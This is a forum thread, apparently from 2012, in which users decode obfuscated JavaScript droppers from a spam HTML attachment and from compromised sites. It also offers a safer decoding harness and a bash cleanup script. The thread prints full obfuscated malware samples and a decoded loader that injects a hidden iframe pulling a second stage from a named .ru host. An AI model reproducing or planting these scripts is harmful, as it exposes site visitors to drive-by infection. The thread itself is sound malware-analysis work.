
Looking for Javascript coder to decode spam HTML attachment


lorddicranius


Post Mon Mar 05, 2012 6:23 pm

Looking for Javascript coder to decode spam HTML attachment

I received a spam message with an HTML attachment.  I downloaded the attachment and opened it in Notepad++ and found it contains Javascript.  I know a little Javascript, but not nearly enough to work out what's going on here.  I was wondering if anybody well versed in Javascript could decode this for me.  I'm really curious what this is trying to do :)

  Code:
<!-- Obfuscated dropper exactly as received in the HTML attachment. Do not open this in a browser; it is the sample.
     How it works:
     1. aa = /\w/.exec(1).index + []  ->  "0" (match index coerced to a string); aaa = '0'. The strict compare
        aa === aaa is an environment sanity check; only the assignment to f is guarded by it.
     2. location({}) throws in a real browser (location is an object, not a function); the rest of the
        script lives inside the catch block, so it only runs when that call throws.
     3. f is a 'q'-separated list of integers. Each entry n becomes String.fromCharCode(38 + n) and the pieces
        are concatenated into s. The loop condition -i > -w.length is just i < w.length written awkwardly.
     4. Math.round(-4 * tan(atan(1/2))) === -3 + 1, i.e. -2 === -2, is a second "is this a real JS engine" gate;
        if it passes, s is handed to e, which is an alias for eval. md = 'a' is an unused decoy.
     The decoded text is the hidden-iframe loader quoted in the next post (second stage on the .ru host).
     NOTE: as rendered on this page the encoded string is line-wrapped and several numbers have a stray space
     inside them (e.g. "7 8q", "- 29q"). 1*'7 8' is NaN, so those positions decode to "\0" rather than the
     intended character; decode from the original attachment, not from this copy. -->
<script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)
f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q 46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q3q85q-29q-29q- 29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q-6q63q70q77q63q-6q85q- 29q-29q-29q62q73q61q79q71q63q72q78q8q81q76q67q78q63q2q -4q22q67q64q76q59q71q63q-6q77q76q61q23q1q66q78q7 8q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q1 8q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q7 4q1q-6q81q67q62q78q66q23q1q11q10q1q- 6q66q63q67q65q66q78q23q1q11q10q1q-6q77q78q83q70q63q23q1q8 0q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63q72q21q74q73q77q67q78q6 7q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64q78q20q10q21q78q73q74q2 0q10q21q1q24q22q9q67q64q76q59q71q63q24q-4q3q21q-29q-29q87q-29q- 29q64q79q72q61q78q67q73q72q-6q67q64q76q59q71q63q76q 2q3q85q-29q-29q-29q80q59q76q-6q64q-6q23q- 6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q31q70q63q71q63q72q78q2q 1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2 q1q77q76q61q1q6q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66 q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70 q60q84q62q72q67q8q74q66q74q1q3q21q64q8q77q78q83q70q63q8q80q67q77q67q6 0q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q64q8q77q78q83q70q63q8q74 q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q78q63q1q21q64q8q77q78q83 q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q83q70q63q8q78q73q74q23q1 q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q81q67q62q78q66q 1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q66q63 q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q-29q62q73q61q79q71q63q72 q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1 q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>

venom77


Post Mon Mar 05, 2012 7:03 pm

Re: Looking for Javascript coder to decode spam HTML attachment

Wants you to load some php file from a .ru domain
hxxp://clkjshdflhhshdf.ru:8080/images/aublbzdni.php

  Code:
// Decoded first stage of the attachment script. It injects a 10x10, hidden, absolutely-positioned
// iframe whose src is the .ru URL below: appended to <body> via iframer() when a body already exists,
// otherwise written directly with document.write().
// This copy was pasted from a browser rendering and lost some characters: the ';' between
// createElement('iframe') and f.setAttribute(...), and the <iframe ...> markup inside document.write("").
// Decoding the original 'q' stream gives `('iframe');f.set` (21 -> ';') and `document.write("<iframe`
// (-4 -> '"', 22 -> '<'), so both are present in the real payload; the string literal is also broken
// across lines here. Treat this as a transcript, not runnable code.
// The src URL is the hostile second stage; do not fetch it from a host or IP you care about.
if (document.getElementsByTagName('body')[0]){ iframer(); } else {
document.write(""); } function iframer() {
var f =document.createElement('iframe') f.setAttribute('src','
http://clkjshdflhhshdf.ru:8080/images/aublbzdni.php
');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';
f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
 document.getElementsByTagName('body')[0].appendChild(f); }

venom77


Post Mon Mar 05, 2012 7:14 pm

Re: Looking for Javascript coder to decode spam HTML attachment

Also, the quick and easy way to decode what you had into what I had...

First, we take what you had:

  Code:
<!-- The attachment script from the first post, re-quoted here. It is wrapped at different points, so the
     stray spaces that the forum inserted into the 'q' values fall in different places (e.g. "6 3q", "q- 6q");
     those positions decode to NaN and must be taken from the original file.
     Structure: environment gates (aa === '0'; location({}) must throw; round(-4*tan(atan(0.5))) === -2),
     then every 'q'-separated number n becomes String.fromCharCode(38 + n), and the resulting string is
     passed to e, an alias for eval. Only the assignment to f sits under the if(aa===aaa); the loop and the
     final e(s) run unconditionally inside the catch. -->
<script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)
f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q6 3q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10 q55q3q85q-29q-29q-29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q- 6q63q70q77q63q-6q85q-29q-29q-29q62q73q61q79q71q63q72 q78q8q81q76q67q78q63q2q-4q22q67q64q76q59q71q63q -6q77q76q61q23q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q 77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q 60q84q62q72q67q8q74q66q74q1q-6q81q67q62q78q66q23q1q1 1q10q1q-6q66q63q67q65q66q78q23q1q11q10q1q- 6q77q78q83q70q63q23q1q80q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63 q72q21q74q73q77q67q78q67q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64 q78q20q10q21q78q73q74q20q10q21q1q24q22q9q67q64q76q59q71q63q24q- 4q3q21q-29q-29q87q-29q-29q64q79q72q61q78q67q73q72q- 6q67q64q76q59q71q63q76q2q3q85q-29q-29q-29q80q59q76q-6q64q- 6q23q-6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q 31q70q63q71q63q72q78q2q1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78 q78q76q67q60q79q78q63q2q1q77q76q61q1q6q1q66q78q78q74q20q9q9q61q70q69q 68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59 q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q3q21q64q8q77q78q8 3q70q63q8q80q67q77q67q60q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q6 4q8q77q78q83q70q63q8q74q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q7 8q63q1q21q64q8q77q78q83q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q8 3q70q63q8q78q73q74q23q1q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78 q63q2q1q81q67q62q78q66q1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q6 7q60q79q78q63q2q1q66q63q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q- 29q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q4 6q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q 29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>


And turn it into something a bit more legible (I've shortened the value of the variable 'f' here to save space):

  Code:
<script>
// Reformatted copy of the attachment script. The long 'q'-separated string assigned
// to f is abbreviated to "-29" in this listing and its closing quote went with it,
// so this is for reading, not for running.
aa=/\w/.exec(1).index+[];            // "0": index of the first \w match in "1", coerced to a string
aaa='0';
try{location({});} catch(hgberger){  // location is not callable in a browser -> TypeError; all work happens in the catch
    if(aa===aaa)                     // environment gate; note: only the next statement (f=...) is conditional
    // full form: f='-29q-29q...q87'.split('q')  -> array of numeric strings
    f='-29.split('q');
    md='a';                          // unused decoy
    e=eval;                          // eval hidden behind an alias
    w=f;
    s=[];
    r=String.fromCharCode;
    for(i=0;-i>-w.length;i+=1){      // i < w.length, written to look odd
      j=i;s=s+r(38+1*w[j]);          // key: char code = 38 + n; [] + string -> string concatenation
    }
    if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)  // -2 === -2: second "real JS engine" gate
      e(s);                          // eval of the decoded loader (the hidden-iframe injector)
}
</script>


A quick glance at the very end tells us to do e(s); and looking up a few lines higher we see e=eval;. So, rather than evaluating s, let's just see what it is by changing the code to document.write(s);:

  Code:
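<script>
// Analysis harness: run the sample's own decoder but DISPLAY the result instead of
// eval()ing it. The 'q' string assigned to f is abbreviated to "-29" in this listing;
// paste the full string from the attachment before running.
// Run this only in an isolated VM with no network: the gates below are still the
// malware's own code, and the decoded text names the second-stage URL.
aa=/\w/.exec(1).index+[];            // "0"
aaa='0';
try{location({});} catch(hgberger){  // location({}) throws in a browser -> catch body runs
    if(aa===aaa)                     // only the f= assignment is guarded by this if
    f='-29'.split('q');              // full form: f='-29q-29q...q87'.split('q')
    md='a';                          // left as in the sample; unused
    e=eval;                          // left as in the sample; no longer called below
    w=f;
    s=[];
    r=String.fromCharCode;
    for(i=0;-i>-w.length;i+=1){      // i < w.length
      j=i;s=s+r(38+1*w[j]);          // char code = 38 + n
    }
    if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1){
      // Do NOT use document.write(s) here: that hands s to the HTML parser, so any tag
      // inside the decoded text (this sample's decoded text contains a literal
      // <iframe src=...>) is rendered and its src fetched instead of being shown.
      // Insert the decoded text as a text node so it is displayed verbatim.
      var out=document.createElement('pre');
      out.appendChild(document.createTextNode(s));
      document.documentElement.appendChild(out);   // body may not exist yet when this runs
    }
}
</script>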


Throw that into a file, save it as whatever.html, and open it in a browser (an isolated one, see below). Then you end up with the code posted previously and can see it's attempting to load that PHP file. One caveat with this shortcut: document.write() hands the decoded string to the HTML parser, so any markup inside it (this sample's decoded text contains a literal <iframe src=...> tag) gets rendered, and its src fetched, instead of displayed; that is presumably why the document.write("") in the output above is empty. Writing s into a <pre> or <textarea> as a text node, or decoding outside a browser altogether, avoids that. It doesn't always work this easily, sometimes you have to dig a little deeper depending on how much of a PITA the author was ;-)

...and obviously it's recommended to do this in some sort of a contained environment (just in case): a throwaway VM with a snapshot to roll back to, no shared folders, and the network disabled or pointed at a sinkhole, since the whole point of the script is to pull in a second stage from that .ru host.

hayabusa


Post Mon Mar 05, 2012 9:06 pm

Re: Looking for Javascript coder to decode spam HTML attachment

Reminds me a bit of the post I wrote on here, a couple of months ago, where I showed some malicious scripts I found during a security eval for a company's website.  I gave a similar writeup / explanation there, although the code was somewhat different.

lorddicranius


Post Tue Mar 06, 2012 1:44 am

Re: Looking for Javascript coder to decode spam HTML attachment

@BillV: Thanks, especially for breaking it down :)
@hayabusa: Yeah, as soon as I opened that file in Notepad++, I thought of that post you did, which had me thinking this might at least pique your interest if nobody elses :P

Tried to download that PHP file, but I'm unable to resolve the domain.  Darn, curious what's in that PHP file :(

dynamik


Post Tue Mar 06, 2012 8:39 am

Re: Looking for Javascript coder to decode spam HTML attachment

See attachment. wget is your friend ;)

*unless it's a trick to exploit wget. Also bear in mind that fetching the second stage from your own machine hands your IP (and User-Agent) to whoever runs that server, and kits like this commonly serve different content, or nothing at all, depending on User-Agent/Referer, so pull it from a disposable, isolated host and expect the response to differ from what a browser would have been given.

Just glancing at it, seems like it's for ad revenue, but I don't have time to go in depth.

I do like the naming conventions they used though: onload="window.lol&&lol()"

lorddicranius


Post Tue Mar 06, 2012 10:29 am

Re: Looking for Javascript coder to decode spam HTML attachment

Hmm, I was using wget haha.  I was playing around with the URL, swapping "1" for lowercase "l", etc.

Thanks for attaching!

Agentcalaver


Post Mon Apr 02, 2012 2:52 am

Re: Looking for Javascript coder to decode spam HTML attachment

Clean this (the same/similar JS turns up injected into HTML pages on compromised web sites) with a bash script such as the one below. Note that this only strips the injected text; unless you also find and close the way it got written there (stolen FTP/CMS credentials, a webshell, a vulnerable plugin), it will simply be re-injected.
  Code:
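# Strip the injected <script>...</script> blob from infected HTML files.
# The anchor is the catch-variable name this family uses ("hgberger"), so the
# grep that lists the files and the sed that edits them agree on what a hit is.
# NOTE: this only removes the injected text. It does not close the hole that
# let the attacker write it (stolen FTP/CMS credentials, a webshell, ...).
MARK="hgberger"

# The injected script contains '>' in its own code (e.g. "-i>-w.length"), so
# the old pattern "^<script>c=2;[^>]*>" stopped at that first '>' and left the
# tail of the blob in place; it also only matched the "c=2;" variant at the
# start of a line, while the grep anchor matched any variant. Match from the
# opening tag through the closing tag instead: the samples in this thread have
# no '<' between <script> and </script>. Like the original, this assumes the
# blob sits on a single line (sed works per line).
OLD="<script>[^<]*${MARK}[^<]*</script>"

echo "Pre:"
grep -rlIF --exclude='*.bak' "$MARK" .

# -Z / -0 keep filenames with spaces intact, -I skips binaries, -r is needed
# for directories, and sed -i.bak leaves a backup so a bad match can be undone.
# '|' is the sed delimiter because $OLD contains '/'.
grep -rlIFZ --exclude='*.bak' "$MARK" . | xargs -0 -r sed -i.bak "s|$OLD||g"

echo "Post:"
grep -rlIF --exclude='*.bak' "$MARK" .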

rserin75


Post Fri Aug 10, 2012 6:36 pm

Re: Looking for Javascript coder to decode spam HTML attachment

I need to decode this code:
  Code:
 <!-- Second sample (rserin75). Same family as the script in the first post, with a different key:
      1. try{1-prototype;}catch(evsd){q=152;}  : the bare name "prototype" is undefined, so the ReferenceError
         sets q, which the last line requires.
      2. if(020==0x10) : legacy octal 020 is 16, so this only parses and runs in non-strict mode; the same
         goes for 012===10 on the last line.
      3. if(window.document) e=eval : wants a browser-like global before aliasing eval.
      4. Decoder: char code = f[j] + 9 + (j % 3). The "j%3" is itself obtained with e("j"+"%"+"3"), an
         indirect eval; it still resolves j because every variable here is an implicit global. So e must
         stay a real eval while decoding; replacing only the final e(s) with a display is safe, replacing e
         itself is not. The loop is hard-wired to 555 iterations and never checks f.length.
      5. The first entries decode to "if (document.getE", i.e. the same hidden-iframe loader shape as the
         first sample (full decode not done here).
      NOTE: as pasted, the wrapping inserted spaces inside numbers ("1 14,3", "5 1,95") and inside the
      keyword "i f(window.document)"; those are syntax errors, so recover the script from the original file
      rather than from this page. -->
 <script>try{1-prototype;}catch(evsd){q=152;}
if(020==0x10){f=[0,-1,94,93,22,29,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112 ,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,31,112,4,-1 ,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,1 14,3,-2,0,-1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,5 1,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37,103, 108,105,104,105,91,99,37,95,99,93,101,36,88,39,38,30,22,108,96,90,105 ,95,51,28,40,38,28,23,94,90,96,93,93,107,51,28,40,38,28,23,105,105,11 2,98,90,52,29,107,96,105,94,89,95,97,96,106,110,49,94,94,91,90,90,101 ,49,101,102,105,94,107,95,100,101,48,86,89,105,100,99,107,105,92,49,9 7,92,92,105,49,38,48,107,101,101,49,38,48,30,52,49,38,95,91,105,87,98 ,92,52,23,32,49,2,0,-1,114,4,-1,-2,93,107,99,90,106,94,102,100,21,96, 92,103,88,99,90,105,30,30,114,3,-2,0,-1,107,88,104,21,93,22,50,23,90, 100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,10 6,29,30,95,91,105,87,98,92,29,30,50,92,35,106,91,105,56,106,105,105,9 5,87,108,106,90,31,29,104,105,89,28,35,29,93,107,106,101,49,37,36,105 ,107,104,106,104,90,101,36,94,101,92,100,38,87,38,40,29,30,50,92,35,1 06,106,110,99,91,35,109,95,104,96,88,94,99,95,105,112,51,28,95,95,89, 91,91,99,30,49,91,37,105,105,112,98,90,37,102,100,106,95,105,96,101,9 9,52,29,86,89,105,100,99,107,105,92,29,48,93,36,104,107,111,97,92,36, 97,92,92,105,52,29,37,30,49,91,37,105,105,112,98,90,37,106,100,103,51 ,28,39,29,48,93,36,104,92,106,54,107,106,103,96,88,106,107,91,29,30,1 09,94,91,106,93,30,34,28,40,38,28,32,49,91,37,105,90,107,55,105,107,1 04,94,89,107,105,92,30,28,95,91,94,94,94,105,30,34,28,40,38,28,32,49, 2,0,-1,-2,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99 ,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37 ,84,36,86,103,102,90,101,90,56,95,95,97,91,30,91,32,49,2,0,-1,114];}i f(window.document)e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i+555!=0;i+=1){j=i;s=s+r((w[j]*1+(9+e("j"+"%"+"3"))));}
if(q&&f&&012===10)e(s);</script>

venom77


Post Mon Aug 13, 2012 2:21 pm

Re: Looking for Javascript coder to decode spam HTML attachment

rserin75 wrote:I need decode ..  this code


Looks to be similar (e.g., ends in "e(s)"). Follow the instructions above and it should be easily determined, with two details: replace only the final e(s); the e("j"+"%"+"3") inside the loop has to stay a real eval, because the per-character key depends on j%3. And the octal literals (020, 012) mean it must run in non-strict mode.
